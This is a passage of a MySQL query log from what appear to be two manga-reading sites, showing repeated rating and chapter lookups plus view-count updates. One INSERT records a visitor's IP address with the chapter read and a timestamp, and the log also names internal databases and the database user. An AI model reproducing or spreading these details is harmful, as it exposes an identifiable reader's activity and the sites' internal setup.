(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330648075 Quit 330648076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330648076 Quit 330648077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330648077 Quit 330648078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330648078 Quit 330648079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330648079 Quit 330648080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330648080 Quit 330648081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330648081 Quit 330648082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330648082 Quit 330648083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330648083 Quit 330648084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330648084 Quit 330648085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330648085 Quit 330648086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330648086 Quit 330648087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330648087 Quit 330648088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330648088 Quit 330648089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330648089 Quit 330648090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330648090 Quit 330648091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330648091 Quit 330648092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330648092 Quit 330648093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330648093 Quit 330648094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330648094 Quit 330648095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330648095 Quit 330648096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330648096 Quit 330648097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330648097 Quit 330648098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330648098 Quit 330648099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330648099 Quit 330648100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330648100 Quit 330648101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330648101 Quit 330648102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330648102 Quit 330648103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330648103 Quit 330648104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330648104 Quit 330648105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330648105 Quit 330648106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330648106 Quit 330648107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330648107 Quit 330648108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330648108 Quit 330648109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330648109 Quit 330648110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330648110 Quit 330648111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330648111 Quit 330648112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330648112 Quit 330648113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330648113 Quit 330648114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330648114 Quit 330648115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330648115 Quit 330648116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330648116 Quit 330648117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330648117 Quit 330648118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330648118 Quit 330648119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330648119 Quit 330648120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330648120 Quit 330648121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330648121 Quit 330648122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330648122 Quit 330648123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330648123 Quit 330648124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330648124 Quit 330648125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330648125 Quit 330648126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330648126 Quit 330648127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330648127 Quit 330648128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330648128 Quit 330648129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330648129 Quit 330648130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330648130 Quit 330648131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330648131 Quit 330648132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330648132 Quit 330648133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330648133 Quit 330648134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330648134 Quit 330648135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330648135 Quit 330648136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330648136 Quit 330648137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330648137 Quit 330648138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648139 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648138 Quit 330648139 Quit 330648140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648140 Quit 330648141 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330648142 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648143 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648142 Quit 330648143 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY (k.id * FLOOR(1 + RAND() * 100000)) % 100000 DESC limit 10 330648143 Quit 330648144 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648144 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 50 330648144 Quit 330648145 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648145 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330648145 Quit 330648146 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648147 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648146 Quit 330648147 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648147 Quit 330648148 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330648148 Quit 330648149 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330648149 Quit 330648150 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330648150 Quit 330648151 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330648151 Quit 330648152 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330648152 Quit 330648153 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330648153 Quit 330648154 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330648154 Quit 330648155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330648155 Quit 330648156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330648156 Quit 330648157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330648157 Quit 330648158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330648158 Quit 330648159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648159 Query select * FROM chapters where manga_id = '262' order by created desc limit 1 330648159 Quit 330648160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330648160 Quit 330648161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648161 Query select * FROM chapters where manga_id = '237' order by created desc limit 1 330648161 Quit 330648162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330648162 Quit 330648163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648163 Query select * FROM chapters where manga_id = '257' order by created desc limit 1 330648163 Quit 330648164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330648164 Quit 330648165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648165 Query select * FROM chapters where manga_id = '216' order by created desc limit 1 330648165 Quit 330648166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330648166 Quit 330648167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648167 Query select * FROM chapters where manga_id = '275' order by created desc limit 1 330648167 Quit 330648168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330648168 Quit 330648169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648169 Query select * FROM chapters where manga_id = '292' order by created desc limit 1 330648169 Quit 330648170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330648170 Quit 330648171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648171 Query select * FROM chapters where manga_id = '270' order by created desc limit 1 330648171 Quit 330648172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330648172 Quit 330648173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648173 Query select * FROM chapters where manga_id = '24' order by created desc limit 1 330648173 Quit 330648174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330648174 Quit 330648175 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648175 Query select * FROM chapters where manga_id = '169' order by created desc limit 1 330648175 Quit 330648176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330648176 Quit 330648177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648177 Query select * FROM chapters where manga_id = '172' order by created desc limit 1 330648177 Quit 330648178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330648178 Quit 330648179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648179 Query select * FROM chapters where manga_id = '230' order by created desc limit 1 330648179 Quit 330648180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330648180 Quit 330648181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648181 Query select * FROM chapters where manga_id = '267' order by created desc limit 1 330648181 Quit 330648182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330648182 Quit 330648183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648183 Query select * FROM chapters where manga_id = '271' order by created desc limit 1 330648183 Quit 330648184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330648184 Quit 330648185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648185 Query select * FROM chapters where manga_id = '277' order by created desc limit 1 330648185 Quit 330648186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330648186 Quit 330648187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648187 Query select * FROM chapters where manga_id = '300' order by created desc limit 1 330648187 Quit 330648188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330648188 Quit 330648189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648189 Query select * FROM chapters where manga_id = '304' order by created desc limit 1 330648189 Quit 330648190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330648190 Quit 330648191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648191 Query select * FROM chapters where manga_id = '303' order by created desc limit 1 330648191 Quit 330648192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330648192 Quit 330648193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648193 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330648193 Quit 330648194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330648194 Quit 330648195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648195 Query select * FROM chapters where manga_id = '281' order by created desc limit 1 330648196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648195 Quit 330648197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330648197 Quit 330648198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648196 Quit 330648198 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12731' 330648199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648199 Query select * FROM chapters where manga_id = '291' order by created desc limit 1 330648198 Quit 330648199 Quit 330648200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648200 Query select * FROM chapters where id = '12731' 330648201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330648200 Quit 330648201 Quit 330648202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648202 Query select * FROM chapters where manga_id = '27' order by id desc 330648203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648203 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330648203 Quit 330648204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330648204 Quit 330648205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648205 Query select * FROM chapters where manga_id = '251' order by created desc limit 1 330648205 Quit 330648206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330648206 Quit 330648207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648207 Query select * FROM chapters where manga_id = '246' order by created desc limit 1 330648207 Quit 330648208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330648208 Quit 330648209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648209 Query select * FROM chapters where manga_id = '241' order by created desc limit 1 330648209 Quit 330648210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330648210 Quit 330648211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648211 Query select * FROM chapters where manga_id = '222' order by created desc limit 1 330648211 Quit 330648212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330648212 Quit 330648213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648213 Query select * FROM chapters where manga_id = '221' order by created desc limit 1 330648202 Quit 330648213 Quit 330648214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648214 Query Update chapters set view=view+1 where id = '12731' 330648215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648214 Quit 330648215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330648215 Quit 330648216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648216 Query select * FROM chapters where id = '12731' 330648216 Quit 330648217 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648217 Query select * FROM chapters where manga_id = '211' order by created desc limit 1 330648217 Quit 330648218 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12731' 330648219 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330648219 Quit 330648221 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648218 Quit 330648221 Query select * FROM chapters where manga_id = '210' order by created desc limit 1 330648221 Quit 330648220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648220 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '12731', '91.106.58.29', 'mangacherri.com', '2026-02-26 03:28:52', '2026-02-26 03:28:52') 330648222 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330648222 Quit 330648223 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648223 Query select * FROM chapters where manga_id = '202' order by created desc limit 1 330648220 Quit 330648223 Quit 330648224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648224 Query select * FROM chapter_images where chapter_id = '12731' 330648225 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648224 Quit 330648225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330648225 Quit 330648226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648226 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330648227 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648227 Query select * FROM chapters where manga_id = '181' order by created desc limit 1 330648227 Quit 330648228 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330648228 Quit 330648229 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648229 Query select * FROM chapters where manga_id = '162' order by created desc limit 1 330648230 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330648230 Quit 330648229 Quit 330648231 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648231 Query select * FROM chapters where manga_id = '161' order by created desc limit 1 330648231 Quit 330648232 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330648232 Quit 330648233 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648233 Query select * FROM chapters where manga_id = '159' order by created desc limit 1 330648233 Quit 330648234 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330648234 Quit 330648235 